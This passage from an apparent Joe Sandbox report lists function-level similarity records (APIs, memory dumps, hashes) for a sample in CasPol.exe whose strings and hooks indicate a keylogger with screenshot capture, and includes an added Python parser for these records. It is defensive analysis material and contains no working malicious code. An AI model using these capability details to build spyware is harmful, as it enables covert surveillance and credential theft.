                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 0-2556327735
                                                                                                                                                                                                                                  • Opcode ID: 507a8f99fb2f8aeae77eb467a91de779bd9d22195f1c0cdebb523f72ae0d2118
                                                                                                                                                                                                                                  • Instruction ID: 4af35c2643fa0229985ac1aea7182f36bb2eeb850aac5675f62255cc1c7371e4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 507a8f99fb2f8aeae77eb467a91de779bd9d22195f1c0cdebb523f72ae0d2118
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD41D3317043058BAB24CE58E8848AFB3E9FF916D7321492EF542C7618DB32E9448BA1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 100055E1
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 100055EB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                  • Opcode ID: 0027862d4d7062a5b88e9d5f0e5cbe2b61fa6d23551b62125d086d9ced322fa1
                                                                                                                                                                                                                                  • Instruction ID: 2f3713a405c0175dfbb4312078a92c0e6100ffda4a0d56c92506938931a9961d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0027862d4d7062a5b88e9d5f0e5cbe2b61fa6d23551b62125d086d9ced322fa1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7931C835704B408FF724CE5CACA0A1BB3E7EB406D7B610A2DF592CB695D762ED4087A1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 0-2556327735
                                                                                                                                                                                                                                  • Opcode ID: 25fba71cc95f781cd9963768d063412e9d4f9aac76987ea5514fa5efdf1f4ec8
                                                                                                                                                                                                                                  • Instruction ID: 15c224a21538f9790836f5c726a40e0df5128f8623dfe489635fbbf3d33d23f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25fba71cc95f781cd9963768d063412e9d4f9aac76987ea5514fa5efdf1f4ec8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C31C6323047119BF726CE5CAC8096BF3EDEB956D1760CA2EE58187759CB32DC4087A1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 0-2556327735
                                                                                                                                                                                                                                  • Opcode ID: 70dbc66239ad932e5ad2578cf957121af7253a2e763b2f5b83b09a84689d1bac
                                                                                                                                                                                                                                  • Instruction ID: 1ea6db056af32ae78525d840582dd1771f02cb9085f46fc2c6811f606c33abc7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70dbc66239ad932e5ad2578cf957121af7253a2e763b2f5b83b09a84689d1bac
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F31D5B27057108BA734DE5CE88085EF3E9FF81691322562EF186C7618DF31AA4487A5
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10003FDB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: invalid string position$string too long
• API String ID: 909987262-4289949731
• Opcode ID: b9ae4267b34400fa55d51dc4f8be9ceed40e1449c4501b0f5fd7de9ec1f04af8
• Instruction ID: 67010eaabe5ec19f8eb2dbbdff826c503681b6fb1e0afb3ed4744b86d6ac49c7
• Opcode Fuzzy Hash: b9ae4267b34400fa55d51dc4f8be9ceed40e1449c4501b0f5fd7de9ec1f04af8
• Instruction Fuzzy Hash: F631D2367043128BE721CE5CE840B67F7F9EB916A1F214A3FF5468B649D772A84087A1

APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 1000AE36
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID: $MZ@
• API String ID: 2325560087-1719208621
• Opcode ID: 391da35a3863b86254b03c17b4306fa7bf071c5b162a5709827f420cadfd38cb
• Instruction ID: c10e40035c381da4b7154146db833fe46c232d81a9f0e8cf3361085bbbd73af4
• Opcode Fuzzy Hash: 391da35a3863b86254b03c17b4306fa7bf071c5b162a5709827f420cadfd38cb
• Instruction Fuzzy Hash: C5516AB1D10A568BEB44CFA5C8C16AEBBF4FB48394F20C16AD409EB254D334A981CF60

APIs
• GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Info
• String ID: $fD
• API String ID: 1807457897-3092946448
• Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
• Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
• Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
• Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65

APIs
• std::_Xinvalid_argument.LIBCPMT ref: 10003B85
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: invalid string position$string too long
• API String ID: 909987262-4289949731
• Opcode ID: e80fc9e7acba93add0a864e2ea6d913136b8c73cf80dd9242073d50fb3e317ae
• Instruction ID: edc99c1af25dbac56c4533e702380cee898722e9e6e8df2b93293301c0b2d031
• Opcode Fuzzy Hash: e80fc9e7acba93add0a864e2ea6d913136b8c73cf80dd9242073d50fb3e317ae
• Instruction Fuzzy Hash: F631CF32304710CB9721DF6CE88085BF3E9FF85695311862FE686C7219EB31A95487A2

APIs
• std::_Xinvalid_argument.LIBCPMT ref: 1000818D
• std::_Xinvalid_argument.LIBCPMT ref: 10008197
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: vector<T> too long
• API String ID: 909987262-3788999226
• Opcode ID: cb9423fad82669d08df49fd2dc675643d09d7b70617caed834aba26ae0979558
• Instruction ID: 1ccc3903a69bb7a6bcf247a0b5372026bbc2c80ecff82e53e65115d2b39116d6
• Opcode Fuzzy Hash: cb9423fad82669d08df49fd2dc675643d09d7b70617caed834aba26ae0979558
• Instruction Fuzzy Hash: A231C2353006065FDB2CCE79DDD445AB7E6FF842A03288A3DE587C7688D671F9418740

APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
  • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
• SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
  • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
  • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/jpeg
• API String ID: 1291196975-3785015651
• Opcode ID: 29e46e97bc209fd80a14507a4fac636fcf811418306fc8b90605501f7b711469
• Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
• Opcode Fuzzy Hash: 29e46e97bc209fd80a14507a4fac636fcf811418306fc8b90605501f7b711469
• Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
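The records above are Joe Sandbox's function-level similarity data: for each function, the APIs it calls, the memory dump it was lifted from, and the IDs and fuzzy hashes used to match it against other samples. When pivoting on these (for instance, which dumped image contains the GDI+ stream routine with the image/jpeg string, or whether the Opcode ID column really is the same value as the Opcode Fuzzy Hash), it helps to have them as structured records rather than a text listing. The parser below is an added example written for this page; it is not part of Joe Sandbox or of its report. It runs on a constructed sample made of two of the entries above, and the field meanings it assumes (the hexadecimal Offset value on the Source File line being the dump's image base, and the Yara matches header appearing only for dumps that have matches) are inferred from the listing rather than documented.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two records copied from the function listing above,
# reduced to the lines this parser consumes (Associated dumps omitted).
SAMPLE = """\
APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
  • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/jpeg
• API String ID: 1291196975-3785015651
• Opcode ID: 29e46e97bc209fd80a14507a4fac636fcf811418306fc8b90605501f7b711469
• Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
• Opcode Fuzzy Hash: 29e46e97bc209fd80a14507a4fac636fcf811418306fc8b90605501f7b711469
• Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 1000AE36
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID: $MZ@
• API String ID: 2325560087-1719208621
• Opcode ID: 391da35a3863b86254b03c17b4306fa7bf071c5b162a5709827f420cadfd38cb
• Instruction ID: c10e40035c381da4b7154146db833fe46c232d81a9f0e8cf3361085bbbd73af4
• Opcode Fuzzy Hash: 391da35a3863b86254b03c17b4306fa7bf071c5b162a5709827f420cadfd38cb
• Instruction Fuzzy Hash: C5516AB1D10A568BEB44CFA5C8C16AEBBF4FB48394F20C16AD409EB254D334A981CF60
"""

# Section headers as they appear in the listing; a new "APIs" header starts a record.
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
           "Yara matches", "Similarity"}
# Name.MODULE followed by "(" or whitespace; covers "std::_Xinvalid_argument.LIBCPMT ref:" too.
API_RE = re.compile(r"([A-Za-z_][A-Za-z0-9_:]*)\.([A-Z0-9]+)(?=[(\s])")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
BASE_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")  # assumption: Offset is the image base


@dataclass
class FunctionEntry:
    apis: List[str] = field(default_factory=list)   # direct calls and subcalls, in order
    fields: Dict[str, str] = field(default_factory=dict)
    yara_matches: bool = False
    image_base: Optional[int] = None


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the listing into one FunctionEntry per 'APIs' block."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            if line == "APIs":
                current = FunctionEntry()
                entries.append(current)
            elif line == "Yara matches" and current is not None:
                current.yara_matches = True
            section = line
            continue
        if current is None:
            continue
        if section == "APIs":
            m = API_RE.search(line)
            if m:
                current.apis.append(f"{m.group(1)}.{m.group(2)}")
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
            current.fields[key] = value
            if key == "Source File":
                b = BASE_RE.search(value)
                if b:
                    current.image_base = int(b.group(1), 16)
    return entries


def apis_by_image_base(entries: List[FunctionEntry]) -> Dict[Optional[int], List[str]]:
    """Map each dumped image base to the sorted set of APIs its functions touch."""
    out: Dict[Optional[int], set] = {}
    for e in entries:
        out.setdefault(e.image_base, set()).update(e.apis)
    return {k: sorted(v) for k, v in out.items()}


def opcode_id_is_fuzzy_hash(entry: FunctionEntry) -> bool:
    """Check, rather than assume, that Opcode ID and Opcode Fuzzy Hash carry the same value."""
    return entry.fields.get("Opcode ID") == entry.fields.get("Opcode Fuzzy Hash")


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for base, names in apis_by_image_base(parsed).items():
        print(f"{base:#x}: {', '.join(names)}")
    print("Opcode ID == Opcode Fuzzy Hash for all:", all(map(opcode_id_is_fuzzy_hash, parsed)))
```

In this report the Opcode ID and Opcode Fuzzy Hash columns carry identical values while Instruction ID and Instruction Fuzzy Hash differ, so a pivot on "opcode hash" needs only one of the two columns; the check above makes that explicit instead of relying on eyeballing the listing.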
APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 1000A2BF
• std::_Xinvalid_argument.LIBCPMT ref: 1000A2D1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: string too long
• API String ID: 909987262-2556327735
APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
  • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
• SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
  • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
  • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/png
• API String ID: 1291196975-2966254431
APIs
• GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 004049E5
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: _strlen
• String ID: : $Se.
• API String ID: 4218353326-4089948878
APIs
• GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
                                                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                                                  • String ID: alarm.wav$xIG
                                                                                                                                                                                                                                  • API String ID: 1174141254-4080756945
                                                                                                                                                                                                                                  • Opcode ID: b5ca722cdde6f6b3a06bca646ac48d5ba066ff8e75ffb3c1fa2bfcd6fa3ac476
                                                                                                                                                                                                                                  • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5ca722cdde6f6b3a06bca646ac48d5ba066ff8e75ffb3c1fa2bfcd6fa3ac476
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04572903
                                                                                                                                                                                                                                    • Part of subcall function 045735D2: RaiseException.KERNEL32(?,?,?,04572925,00000000,00000000,00000000,?,?,?,?,?,04572925,?,045821B8), ref: 04573632
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04572920
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                  • Opcode ID: b89f387040604b215d55f14119055f9825f5afd00db0cffc5a23f90edb210005
                                                                                                                                                                                                                                  • Instruction ID: 2399ea823d25c38313dcf1693b2c4f7ba388ab2dd865c6b6a619553155c6aa1f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b89f387040604b215d55f14119055f9825f5afd00db0cffc5a23f90edb210005
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF0F434A0030E739B04BAA5FC449AD37ACBF41654F5085F4FA14A2091FF31FA16F580
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                                                                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
